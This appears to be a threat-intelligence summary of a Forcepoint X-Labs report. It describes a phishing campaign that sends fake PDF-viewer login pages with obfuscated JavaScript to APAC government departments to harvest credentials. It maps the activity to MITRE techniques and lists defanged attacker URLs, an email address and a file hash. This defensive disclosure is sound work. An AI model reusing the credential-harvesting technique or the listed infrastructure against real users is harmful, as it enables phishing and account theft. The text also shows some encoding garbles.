Forcepoint X-Labs reports a phishing campaign targeting APAC government departments, delivering HTML masquerading as PDF viewer login pages to harvest credentials. The HTML contains hidden tags and obfuscated JavaScript to conceal malicious activity.
#hachemi52d31 #APACGovDepartments #HTMLMasquerading #PDFViewerLogin #ForcepointXLabs #LiveFr
#hachemi52d31 #APACGovDepartments #HTMLMasquerading #PDFViewerLogin #ForcepointXLabs #LiveFr
Keypoints
- The phishing emails imitate PDF viewer login pages to trick victims into entering their credentials.
- Email activity appears to originate from the envelope sender hachemi52d31 and targets APAC government departments.
- The fake login page HTML contains hidden tags and obfuscated JavaScript, indicating malicious intent.
- De-obfuscated JavaScript reveals credential-collection logic and an AJAX POST to a remote server.
- The code includes URL hash processing and redirect logic to a credit-card invoice page after credential submission.
<liKey IOCs include attacker email, phishing URLs, a credit card invoice URL, and an HTML SHA1 hash.
MITRE Techniques
- [T1036] Masquerading β Masquerading as PDF Viewer Login Page. Quote: βMasquerading as PDF Viewer Login Pageβ
- [T1566.001] Phishing β The phishing emails mimic PDF viewer login pages to trick victims into entering their credentials. Quote: βThe phishing emails mimic PDF viewer login pages to trick victims into entering their credentials.β
- [T1027] Obfuscated/Compressed Files and Information β The HTML code contains hidden tags and obfuscated JavaScript. Quote: βThe HTML code of the fake login page contains hidden tags and obfuscated JavaScript, indicating malicious intent.β
- [T1059.007] JavaScript β The code appears to be an obfuscated JavaScript using a string array with hex indices. Quote: βThe code appears to be an obfuscated JavaScript. It uses an array of strings that are accessed via hexadecimal indices to mask the actual content of the code.β
- [T1071.001] Web Protocols β Credential submission happens via AJAX POST to an external URL. Quote: βIf all validations pass, it sends an AJAX POST request with the email and password fields to the URL retrieved from #f.β
- [T1041] Exfiltration Over C2 Channel β Credentials are posted to a phishing URL. Quote: βCredentials POSTing to a phishing URL. The URL is categorized and blocked under security classification.β
Indicators of Compromise
- [Email Address] Attacker contact β hachemi52d31@live[.fr], Potential attacker email address
- [Phishing URL] β hxxp[://]s810733[.]ha007[.]t[.]mydomain[.]zone/xille/msn-ai[.]php, hxxp[://]s810733[.]ha007[.]t[.]mydomain[.]zone/msn-ai[.]php
- [Credit Card Invoice URL] β hxxps[://]b1498432[.]smushcdn[.]com/1498432/wp-content/uploads/Credit-Card-Payment-Invoice-768Γ993[.]png?lossy=1&strip=1&webp=1
- [HTML SHA1] β 3fcae869e82602a8e809c6eb89856f81148df474
Read more: https://www.forcepoint.com/blog/x-labs/html-phishing-pdf-viewer-login-apac